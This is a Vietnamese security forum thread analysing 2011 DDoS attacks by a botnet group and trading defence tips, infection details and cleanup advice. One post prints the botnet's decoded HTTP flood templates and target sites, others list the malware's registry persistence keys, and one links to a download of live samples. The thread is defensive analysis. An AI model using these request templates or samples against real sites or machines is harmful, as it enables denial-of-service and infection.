hạn crawling: Botnet của stl thích... bò =)) . Bởi vậy, chúng cứ nhè cái gì có đường dẫn là... bò. Cách triệt tiêu hành động bò này là làm sao cho chúng không thấy được đường dẫn. Có nhiều cách từ đơn giản đến phức tạp. Ví dụ, áp dụng biện pháp obsfucate links bằng nhiều cách. Bots của stl không thể là trình duyệt bình thường (nếu không thì kích thước của nó phải cả chục Mb và có đầy đủ mọi thứ như trình duyệt :P ) cho nên có những thứ bots không thể hiểu nổi. 4. Kiểm soát sessions: Bởi vì bots của stl "bò" cho nên chúng nhận được cookie ấn định cho session và bởi vậy, chúng có thể "bò" sâu vô trong. Nếu nhận ra chúng là dạng... "bò" thì invalidate ngay session của chúng thì chúng không bò được nữa. Nói một cách khác, đây là trường hợp "con gà và quả trứng", nếu chúng bò được thì chúng nhận được session cookie và nhận được session cookie thì chúng tiếp tục bò. Bởi vậy, chặn không cho bò thì không thể có cookie có giá trị (và cookie xạo thì chắc chắn không có giá trị rồi e.g. bài học xưa: fixation session cookie). 5. Tuning: Đây là phần tối quan trọng. Bất cứ mọi thứ từ nhỏ nhất tới lớn nhất đều phải đo đạc và tune tối đa. Từ kernel parameters cho đến từng giá trị trong cấu hình của dịch vụ web đều phải cân nhắc kỹ. Tất cả các giá trị "timeout" đều phải đồng bộ từ trên xuống dưới để tránh "ông đánh trống, bà thổi kèn" và tạo negative impact. Ngay cả những luật giới hạn requests cũng phải được theo dõi, phân tích và điều chỉnh để làm sao tránh tạo cản trở cho người dùng thật. 6. Tài nguyên: Cái này thì không thể thiếu được. Cho dù có làm gì đi chăng nữa mà CPU, memory, diskspace không đủ thì chỉ chờ đón... "cái chết đến chậm" :-) . Đầu tháng 8, có lần stl chơi trò rỉ rả mà tạo gần 90 ngàn sessions (y hệt như 90 ngàn thành viên và khách đang viếng diễn đàn). Trước đó, application server không có đủ memory assigment, không đủ threads cho nên lên tới chừng quá 10 ngàn là ngỏm củ tỏi. Tài nguyên cần ấn định cho hợp lý và thậm chí thứa sức để chịu đựng nếu như vòng phòng thủ bị lủng lổ :-) . Già sử mỗi session cần 10k real memory thì application server phải có ít nhất là 1Gb Ram để phục vụ cho 100 ngàn sessions. Cứ vậy mà tính lên. Ngoài ra, backend database cần phải đủ tài nguyên, đủ connections để phục vụ. Cái gì cache được thì cache, cái gì không cache được thì delay công tác "COMMIT" vào database để giảm thiểu CSDL bị dập. Không đủ tài nguyên thì phải nâng cấp. Nói chung, chống DDoS là công tác kiện toàn bảo mật nghiêng hẳn về phía optimisation và tunning. Một website được xây chỉ để "chạy được" nhưng chưa "chạy tốt" thì sẽ chết trong tích tắc. Một website "chạy tốt" thì sống lâu hơn nhưng cũng sẽ chết. Một website chạy cực tốt thì cầm cự lâu hơn để quản trị có đủ thời gian phân tích và đối phó.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Vậy thì chia buồn tiếp tục với mấy anh stl về các con zombies đã xuống địa ngục yên nghỉ (không dám được lên thiên đàng đâu ;)). Không phải tại tụi em nhe, tại mấy cái AV nó gặp là mừng húm, nhảy vào nhai xương "mèo què" của mấy anh liền, em có cản cũng không kịp :-( Đùa một chút vậy thôi, em xin kêu gọi mọi người tiếp tục chung tay tiêu diệt các hành động xấu xa (... tùm lum hết, nói hoài chán rồi) của mấy anh ăn lương nhưng làm chuyện xấu stl: 1. Tiếp tục submit mẫu các zombies (virus, malwares) của mấy anh stl lên các AV mà các bạn đang dùng. Toàn bộ mẫu mà em có của stl tới nay được up ở đây http://www.mediafire.com/?tz745o0f678w8. Các bạn sort theo date, down các mẫu mới về rồi gởi mẫu lên các AV. Càng nhiều người tham gia gởi mẫu thì khả năng virus của stl bi detect là clean (sạch) sẽ càng thấp. 2. Nếu các AV chưa cập nhật và phát hiện ra, các bạn có thể tự tìm diệt bằng tay. Chỉ cần một bộ tool: SysInternalsSuite và Gmer, chép lên USB là các bạn có thể dể dàng diệt đám "mèo què" này rồi. Rất dể diệt: kill hay suspend process EXE của nó, xoá, run AutoRuns để xoá, dọn dẹp registry. Các bạn tìm và diệt trên máy các bạn, máy trong gia đình, trường học, cơ quan các bạn. Đồng thời phổ biến rộng rãi tới mọi người quen, mọi người trong cơ quan, trường học các bạn, bằng mail, Facebook, forum, blog... 3. Và quan trọng, làm sao cho mấy cái website còn sống ngáp ngáp của stl như speed.cyline.org, map.priper.info đi die luôn. Các bạn cùng nhau submit các địa chỉ chứa virus đó như là bad link cho Google, McAfeee.... bất cứ tổ chức nào mà các bạn biết. Càng nhiều người report thì khả năng các website, các host đó chết càng cao. Các bạn đừng nghĩ đây chỉ là vấn đề của HVA với stl. Tụi này đang ddos Vietnamnet, ddos danlambaovn và một loạt các blog khác. Nếu không tiêu diệt nó, tới ngày nào đó, tụi nó thống trị Internet VN ta, và các bạn sẽ là zombies cho tụi nó site khiến, máy tính của các bạn không còn là của bạn nữa, mọi hành động trên máy của các bạn tui nó sẽ nắm hết, website của các bạn sẽ bị ddos bất kỳ lúc nào tụi nó muốn, chỉ mất tầm 15 phút thay đổi file config để đặt link tới website của các bạn là xong, website của các bạn đi luôn. Các bạn nên nhận thức được tầm nguy hiểm của nhóm stl này. Mọi người đều có thể là nạn nhân của stl. Vd như tôi đây, hồi xưa do xỉn xỉn, sương sương và sơ hở trong lúc rce mẫu của tụi nó, bị mất hết pass google, yahoo, pass và id của 3 tài khoản ở ngân hàng, bị tụi nó bêu xấu chính trên blog của mình, rồi dùng chính nick của tôi chat tầm bậy tầm bạ với các bạn khác, vu khống tôi, còn lên HVA post bậy bạ. Tức trên trình duyệ của tôi (và cũng sẽ của các bạn) có lưu username và pwd nào, tụi nó đều có hết. Tới bây giờ, ngồi viết lại mà còn tức, chỉ khi nào có thằng stl nào vào đây công khai xin lỗi tôi và HVA thì mới thôi.. Tôi chỉ là một nạn nhân nhỏ của stl, không sao cả, mất pass, mail, blog rồi vẫn lấy lại được hết, nhưng còn biết bao nhiêu người bị tụi nó "bạch hoá" hèn hạ, xấu xa, bị làm nhục, đời tư, cá nhân, gia đình bị bôi xấu, bêu riếu khắp Internet, bị hăm doạ. Các bài viết tâm huyết, trăn trở của họ viết trên blog của họ, của nạn nhân khác bị xoá hết, bị chiếm blog.... Nếu các bạn ở trường hợp như họ, các bạn có căm tức không ? Vài lời chân thành và mong mọi người tiếp tục tham gia ! Chúng ta thấp cổ bé miệng, không có quyền lực gì như các ISP, các tổ chức "nổ" trong nước, pháp luật thì làm ngơ, báo chí thì chắc có lẽ bị cấm đăng tin... nhưng đoàn kết lại, chúng ta sẽ mạnh hơn nhiều và thừa sức tiêu diệt được cái team xấu xa stl, muốn làm "minh chủ Internet lâm" :-) mọi người dân Việt Nam ta. PS: Lâu rồi mới viết nghiêm túc như vậy, cà rỡn quen rồi ;)

Phân tích tính chất vài trận DDoS HVA vừa qua.

elt0m — GMT

Cảm ơn các bác conmale, TQN, PXMMRF...và các thành viên của HVA đã giúp tôi mở mang kiến thức và có những cách phòng vệ khỏi bọn Sờ Ti Lợn này, bọn này đúng là rác rưởi! Tôi biết mình đang spam nhưng khi đọc các vấn đề kỹ thuật và tâm huyết của các bác, cảm thấy thán phục vì nhiệt huyết dành cho cộng đồng, mặc dù các anh cũng phải bươn trải cơm-áo-gạo-tiền. Vài lời gửi đến các anh! Chúc mọi điều tốt đẹp đến với các anh và HVA! elt0m (thành viên rất cũ mà cũng rất mới)

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

@conmale Có 1 vấn đề này em hay bị mắc phải khi truy cập vào / ( tab 1 ) click vào Forum nó sẽ nhảy ra cái /tof/ ở 1 new tab mới ( tab 2 ) . Nhưng khi em tắt cái ( tab 2 ) rồi click vào cái link forum ở ( tab 1 ) thì nó lại trả về /null. Phải tắt trình duyệt đi mở lại mới vào được.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

mv1098 wrote:

@conmale Có 1 vấn đề này em hay bị mắc phải khi truy cập vào / ( tab 1 ) click vào Forum nó sẽ nhảy ra cái /tof/ ở 1 new tab mới ( tab 2 ) . Nhưng khi em tắt cái ( tab 2 ) rồi click vào cái link forum ở ( tab 1 ) thì nó lại trả về /null. Phải tắt trình duyệt đi mở lại mới vào được.

Hì hì, vậy thì đừng tắt tab2 mà chỉ tắt tab1 và cứ thế mà dùng. Tắt tab2 và trở lại tab1 để click thì "nó" nghĩ đó là zombie cho nên nó "null" liền. Logic nằm ở chỗ đi theo từ tab1 đến tab2 và dùng tab2 chớ không ai đi ngược lại hết.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tới sáng nay, stl vẫn dai dẵng ddos vào các site, blog sau, dùng hai thằng bot nằm vùng SbieMgm.dll và SbieSvc.exe 1. http://danlambaovn.blogspot.com 2. http://www.aihuuphuyen.org 3. http://nguoiduatinkami.wordpress.com 4. http://vrvradio.com 5. http://aotrangoi.com 6. http://viettan.org 7. http://dangviettan.wordpress.com 8. http://radiochantroimoi.com 9. http://radiochantroimoi.wordpress.com Ở trên là config của backgrounds.jpg, còn showthread.php thì hơi khác một chút, tập trung chính vào danlambao: Code:

GET / HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive
 http://danlambaovn.blogspot.com

GET /favicon.ico HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: image/png,image/*;q=0.8,*/*;q=0.5\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive
 http://danlambaovn.blogspot.com
/favicon.ico

GET /2011/08/bieu-tinh-mong-uoc-nhu-dan-thai-lan.html HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive\r\nReferer: http://danlambaovn.blogspot.com/
 http://danlambaovn.blogspot.com
/2011/08/bieu-tinh-mong-uoc-nhu-dan-thai-lan.html

GET / HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive\r\nIf-Modified-Since: Thu, 11 Aug 2011 <(TAG{ 10 23}/TAG)>:<(TAG{ 10 50}/TAG)>:<(TAG{ 20 59}/TAG)> GMT\r\nIf-None-Match: "<(TAG{ 4 ------}/TAG)>-<(TAG{ 1341 5352}/TAG)>-<(TAG{ 2 ------}/TAG)>-<(TAG{ 3521 8953}/TAG)>-<(TAG{ 6 ------}/TAG)>"\r\nReferer: http://danlambaovn.blogspot.com/2011/08/bieu-tinh-mong-uoc-nhu-dan-thai-lan.html
 http://danlambaovn.blogspot.com

Dù không liên quan tới HVA chúng ta nhưng hành động ddos thì không thể chấp nhận được. Mong các bạn phổ biến, tìm diệt 2 file kể trên.

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

TQN wrote:

GET / HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive
 http://danlambaovn.blogspot.com

GET /favicon.ico HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: image/png,image/*;q=0.8,*/*;q=0.5\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive
 http://danlambaovn.blogspot.com
/favicon.ico

GET /2011/08/bieu-tinh-mong-uoc-nhu-dan-thai-lan.html HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive\r\nReferer: http://danlambaovn.blogspot.com/
 http://danlambaovn.blogspot.com
/2011/08/bieu-tinh-mong-uoc-nhu-dan-thai-lan.html

GET / HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-gb,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: keep-alive\r\nIf-Modified-Since: Thu, 11 Aug 2011 <(TAG{ 10 23}/TAG)>:<(TAG{ 10 50}/TAG)>:<(TAG{ 20 59}/TAG)> GMT\r\nIf-None-Match: "<(TAG{ 4 ------}/TAG)>-<(TAG{ 1341 5352}/TAG)>-<(TAG{ 2 ------}/TAG)>-<(TAG{ 3521 8953}/TAG)>-<(TAG{ 6 ------}/TAG)>"\r\nReferer: http://danlambaovn.blogspot.com/2011/08/bieu-tinh-mong-uoc-nhu-dan-thai-lan.html
 http://danlambaovn.blogspot.com

Dù không liên quan tới HVA chúng ta nhưng hành động ddos thì không thể chấp nhận được. Mong các bạn phổ biến, tìm diệt 2 file kể trên.

Tự hỏi danlambao là xài blogspot là hàng của google? không hiểu tụi Sờ Ti Lợn này cũng có óc lợn luôn hay sao. DDoS nó khác gì DDoS google. mà với lượng bot như anh conmale nói là 5Mbps thì sao có thể cho danlambao die được

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

He he, hôm qua anh thấy một đống zombies đập đầu vô "favicon.ico", anh hơi ngạc nhiên. Thử chạy cái decode thì thấy nó không đánh HVA mà đánh danlambao nhưng không hiểu sao HVA vẫn bị đập vô "favicon.ico". Chứng tỏ chắc chắn có một botnet khác. Chuyện khôi hài ở chỗ các bạn stl bị tẩu hoả nặng rồi. Hết chỗ đập lại đi đập vô "favicon.ico" là sao không biết =)) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

Dpm — GMT

Chắc là mấy bác ấy muốn đánh vào băng thông hva,vì favicon.ico là 3.6K,còn đánh vào 1 link bất kỳ server sẽ trả vể 403 nội dụng 2.1K,dù sao mỗi request cũng đc 1.5K :D.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

conmale wrote:

Có một khía cạnh đơn giản nhưng quan trọng có lẽ nên đề cập đó là quá trình biến máy con thành zombie của "AcrobatUpdater.exe". Trong suốt quá trình nhiễm này, có hai tiểu đoạn: 1. Tạo ra: C:\Program Files\Adobe\Updater6 [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe 2. Điều chỉnh registry: - Với key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], Value Name: [ CURRENT ], New Value: [ 2011-07-20 16:28:52 ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], Value Name: [ DATA ], New Value: [ 0x5d4c3c3d3f4b572501120204081e0371454349440e5f514c24484d550e13 ] Nếu người dùng chỉ là "standard user" chớ chẳng phải là user với chủ quyền "administrator" thì hai động tác trên không thể xảy ra được. Trên Windows 7 càng khó hơn vì càng không thể "silently" thực thi việc này. Bởi vậy, với tổng cộng gần 100 ngàn IP tấn công HVA mấy ngày vừa qua (số lượng máy con thật sự đằng sau các IP này có lẽ còn nhiều hơn rất nhiều) toàn là những máy con chạy với chủ quyền "Administrator". Đây là sự thật đáng sợ. Cho dùng Windows 7 có bảo mật như thế nào đi chăng nữa mà người dùng sử dụng máy với account có chủ quyền cao nhất thì coi như tính bảo mật của Windows 7 cũng bỏ đi. Vấn đề được đặt ra, tại sao người dùng dễ dàng tải exe từ những nguồn nào đó không phải từ trang chính thức của Adobe? Hãy gác qua chuyện tạo máy con làm zombies để DDoS mà hãy hình dung xem, hàng trăm ngàn máy con bị điều khiển, bị đánh cắp thông tin (có thể có cả những máy có thông tin quan trọng bởi vì trong danh sách IP tấn công HVA có cả những IP thuộc các ban ngành của chính phủ). Liệu đây là chuyện có thể xem nhẹ và làm ngơ?

conmale wrote:

PXMMRF wrote:

Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.
Hì hì, câu này anh Mai nói ngược rồi. Bởi vì hầu hết dùng Windows XP và chỉ có 5-8% dùng Windows 7 (trong số người dùng Windows 7 thỉ chỉ có 30-40% bị nhiễm) cho nên dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN. Sau kết quả điều tra sơ khởi, em thấy cả hệ thống máy của một trường đại học đều ấn định người dùng có chủ quyền "Administrator" và hàng chục doanh nghiệp lớn/vừa cũng không tránh khỏi lỗ hổng này. Trong con số 20 người dùng máy bình mà em hỏi thăm thì 100% là chạy dưới chủ quyền "Administrator". Bởi vậy, dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN chớ không phải "khó" :P .

Có lẽ anh conmale nhầm ở điểm nào đó, STL bot chạy và hoạt động không cần quyền Administrator ở Windows XP.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

bolzano_1989 wrote:

conmale wrote:

Có một khía cạnh đơn giản nhưng quan trọng có lẽ nên đề cập đó là quá trình biến máy con thành zombie của "AcrobatUpdater.exe". Trong suốt quá trình nhiễm này, có hai tiểu đoạn: 1. Tạo ra: C:\Program Files\Adobe\Updater6 [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe 2. Điều chỉnh registry: - Với key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], Value Name: [ CURRENT ], New Value: [ 2011-07-20 16:28:52 ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], Value Name: [ DATA ], New Value: [ 0x5d4c3c3d3f4b572501120204081e0371454349440e5f514c24484d550e13 ] Nếu người dùng chỉ là "standard user" chớ chẳng phải là user với chủ quyền "administrator" thì hai động tác trên không thể xảy ra được. Trên Windows 7 càng khó hơn vì càng không thể "silently" thực thi việc này. Bởi vậy, với tổng cộng gần 100 ngàn IP tấn công HVA mấy ngày vừa qua (số lượng máy con thật sự đằng sau các IP này có lẽ còn nhiều hơn rất nhiều) toàn là những máy con chạy với chủ quyền "Administrator". Đây là sự thật đáng sợ. Cho dùng Windows 7 có bảo mật như thế nào đi chăng nữa mà người dùng sử dụng máy với account có chủ quyền cao nhất thì coi như tính bảo mật của Windows 7 cũng bỏ đi. Vấn đề được đặt ra, tại sao người dùng dễ dàng tải exe từ những nguồn nào đó không phải từ trang chính thức của Adobe? Hãy gác qua chuyện tạo máy con làm zombies để DDoS mà hãy hình dung xem, hàng trăm ngàn máy con bị điều khiển, bị đánh cắp thông tin (có thể có cả những máy có thông tin quan trọng bởi vì trong danh sách IP tấn công HVA có cả những IP thuộc các ban ngành của chính phủ). Liệu đây là chuyện có thể xem nhẹ và làm ngơ?

conmale wrote:

PXMMRF wrote:

Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.
Hì hì, câu này anh Mai nói ngược rồi. Bởi vì hầu hết dùng Windows XP và chỉ có 5-8% dùng Windows 7 (trong số người dùng Windows 7 thỉ chỉ có 30-40% bị nhiễm) cho nên dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN. Sau kết quả điều tra sơ khởi, em thấy cả hệ thống máy của một trường đại học đều ấn định người dùng có chủ quyền "Administrator" và hàng chục doanh nghiệp lớn/vừa cũng không tránh khỏi lỗ hổng này. Trong con số 20 người dùng máy bình mà em hỏi thăm thì 100% là chạy dưới chủ quyền "Administrator". Bởi vậy, dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN chớ không phải "khó" :P .
Có lẽ anh conmale nhầm ở điểm nào đó, STL bot chạy và hoạt động không cần quyền Administrator ở Windows XP.

Anh thử ngay trên máy chạy XP ở nhà với quyền user bình thường. STL malware hoàn toàn không thể chỉnh registry, không thể hoàn tất quá trình.. nhiễm được.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Em thì vừa thấy máy tính sử dụng tài khoản limited dành cho sinh viên một trường bị nhiễm virus STL :) . Có lẽ anh format ổ đĩa với NTFS format ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

bolzano_1989 wrote:

Em thì vừa thấy máy tính sử dụng tài khoản limited dành cho sinh viên một trường bị nhiễm virus STL :) .

Đoạn viết trên của tôi mà bolzano_1989 trích ra, có thể gây hiểu nhầm. Vì sau khi anh conmale có ý kiến nhận đinh. Ý kiến này cũng đã được bolzano_1989 trích ra sau đó (như thấy ở trên), thì tôi đã có ý kiến giải thích ngay, như sau:

PXMMRF tai trang 7 topic nay wrote:

Hì hì, câu này mình nói với ý khác. Vì axasin thông báo là cài cái Malicious Unikey mà bạn ấy download về chỉ tạo các file virus MSHelpCenter.* trong Windows 7 thôi , còn trong Win XP thì không được (nghĩa là Win XP thì không bị nhiễm virus khi cài malicious Unikey nói trên). Vì số người ở VN dùng Win 7 còn ít, nên tôi suy diễn tiếp theo ý axasin như vậy (cũng có ý giỡn vui với rang0 chút chút) Đây là suy diễn theo nhận định của axasin. Chứ tôi đương nhiên là không nghĩ như vậy. Tôi nghĩ máy trên mạng VN hầu hết là cài Win XP và tỷ lệ máy cài Win XP bị nhiễm STL virus-trojan là rất cao. Cần nói thêm là hiện đang có nhiều loại (version) malicious Unikey và Vietkey trên mạng. Malicious Unikey mà axasin cài khác với của lequi đã cài. Còn có nhiều malicious Unikey khác trên mang nũa. Kinh!

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

bolzano_1989 wrote:

Em thì vừa thấy máy tính sử dụng tài khoản limited dành cho sinh viên một trường bị nhiễm virus STL :) . Có lẽ anh format ổ đĩa với NTFS format ?

Đúng rồi. Máy anh chạy XP có ổ đĩa NTFS. Mọi thứ default, chưa hề set cái gì trong policies hết. Anh vừa thử lại, chắc chắn không thực hiện được các công đoạn lan nhiễm của stl malware.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

conmale wrote:

bolzano_1989 wrote:

Em thì vừa thấy máy tính sử dụng tài khoản limited dành cho sinh viên một trường bị nhiễm virus STL :) . Có lẽ anh format ổ đĩa với NTFS format ?
Đúng rồi. Máy anh chạy XP có ổ đĩa NTFS. Mọi thứ default, chưa hề set cái gì trong policies hết. Anh vừa thử lại, chắc chắn không thực hiện được các công đoạn lan nhiễm của stl malware.

Khi format ổ đĩa với file system FAT 32 hay với cà NTFS, cài Win XP và không config. lai "local policies" (trong Computer Management----> Local policies---->Security Options) thì dù chạy máy với account limited, có thể vẫn bị nhiễm STL virus. Cái khái niệm "limited right" trong XP khá mơ hồ và chẳng có user thông thường nào biết chuyện config. lại "local policies". Ngay cả chúng ta, muốn config kỹ và toàn bộ khoảng trên dưới 50 mục trong Security Options cho thật chuẩn, thì cũng không dễ dàng gì. Hì hì. Tính bảo mật cao của NTFS dường như chỉ phát huy trong Win 2K và Win 2K3 (Win 2k8 thì đương nhiên rồi). Ngay việc phân chia account và xác đinh quyền cho từng loại account trong Win 2K Pro, Win 2K3 cũng kỹ và hay hơn Win XP nhiều. Điều này tôi cũng đã viết trong một post trong topic này

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

conmale wrote:

bolzano_1989 wrote:

Em thì vừa thấy máy tính sử dụng tài khoản limited dành cho sinh viên một trường bị nhiễm virus STL :) . Có lẽ anh format ổ đĩa với NTFS format ?
Đúng rồi. Máy anh chạy XP có ổ đĩa NTFS. Mọi thứ default, chưa hề set cái gì trong policies hết. Anh vừa thử lại, chắc chắn không thực hiện được các công đoạn lan nhiễm của stl malware.

Virus của STL ở máy em đề cập được khởi động mỗi khi mở máy tính bằng cách tạo giá trị SbieSvc trong khoá Run của HKCU (HKEY_CURRENT_USER) registry hive (ta không cần quyền Administrator mà chỉ cần quyền của Limited account để ghi vào khóa này): HKCU\Software\Microsoft\Windows\CurrentVersion\Run SbieSvc (Sandboxie Service) Publisher: (Not verified) tzuk %userprofile%\application data\sandboxie\sbiesvc.exe

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

@anh PXMMRF, conmale, bolzano_1989 Trong Windows XP đăng nhập bằng account limited khi 1 ứng dụng thay đổi trong Registry liên quan đến HKEY_LOCAL_MACHINE hoặc liên quan đến các system folder thì nó sẽ bị limited và yêu cầu chạy trên tài khoản Administrator Nhưng nếu những ứng dụng thay đổi trong Registry chỉ liên quan đến HKEY_CURRENT_USER thì nó vẫn có thể thực hiện được. ( ở đây là các ứng dụng chưa được setup trên Windows trước đó )

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

bolzano_1989 wrote:

conmale wrote:

bolzano_1989 wrote:

Em thì vừa thấy máy tính sử dụng tài khoản limited dành cho sinh viên một trường bị nhiễm virus STL :) . Có lẽ anh format ổ đĩa với NTFS format ?
Đúng rồi. Máy anh chạy XP có ổ đĩa NTFS. Mọi thứ default, chưa hề set cái gì trong policies hết. Anh vừa thử lại, chắc chắn không thực hiện được các công đoạn lan nhiễm của stl malware.
Virus của STL ở máy em đề cập được khởi động mỗi khi mở máy tính bằng cách tạo giá trị SbieSvc trong khoá Run của HKCU (HKEY_CURRENT_USER) registry hive (ta không cần quyền Administrator mà chỉ cần quyền của Limited account để ghi vào khóa này): HKCU\Software\Microsoft\Windows\CurrentVersion\Run SbieSvc (Sandboxie Service) Publisher: (Not verified) tzuk %userprofile%\application data\sandboxie\sbiesvc.exe

Malware của stl khi anh chạy thử là trên Windows XP SP3, đĩa NTFS và anh ghi nhận được nó bị dừng lại khi thực hiện công tác chép AcrobatUpdater.exe vô trong C:\Program Files\Adobe\. Nếu anh thử chạy bằng administrator account, nó thực hiện tuồn tuột hết kể cả ghi cái này vô registry: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ]

Phân tích tính chất vài trận DDoS HVA vừa qua.

maithangbs — GMT

conmale wrote:

mv1098 wrote:

@conmale Có 1 vấn đề này em hay bị mắc phải khi truy cập vào / ( tab 1 ) click vào Forum nó sẽ nhảy ra cái /tof/ ở 1 new tab mới ( tab 2 ) . Nhưng khi em tắt cái ( tab 2 ) rồi click vào cái link forum ở ( tab 1 ) thì nó lại trả về /null. Phải tắt trình duyệt đi mở lại mới vào được.
Hì hì, vậy thì đừng tắt tab2 mà chỉ tắt tab1 và cứ thế mà dùng. Tắt tab2 và trở lại tab1 để click thì "nó" nghĩ đó là zombie cho nên nó "null" liền. Logic nằm ở chỗ đi theo từ tab1 đến tab2 và dùng tab2 chớ không ai đi ngược lại hết.

Em thì luôn phải vào HVA theo 1 trong hai cách, từ trang chính hoặc mở thẳng một topic đã được bookmarks sẵn. Tuỳ từng lúc một trong hai cách đó sẽ được.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Vanxuanemp — GMT

Không hiểu sao máy này khi truy cập vào postblog.com của google lại bị báo là đang DDOS, mà dùng SmartSniff v1.8 thấy nhiều truy vấn lạ, xem Process Explorer 15.01 không phát hiện ra được, hic hic, gà nên chả biết sao! Có file log HijackThis 2.0.4 nhờ các bác phân tích giúp: http://www.mediafire.com/?u0c5e6zr5h6gcui

Phân tích tính chất vài trận DDoS HVA vừa qua.

phuongnvt — GMT

mà có khi mình đang trả lời bài viết ngon trớn không biết tại sao không thể đánh được chữ nữa,chuột thì vẫn di chuyển được mà đánh chữ thì không được, phải tắt hẳn trình duyệt rồi vào lại mới được.Làm mình cụt cả hứng luôn vì văn đang tuôn ra!!!!!!!!!1 :-) :D

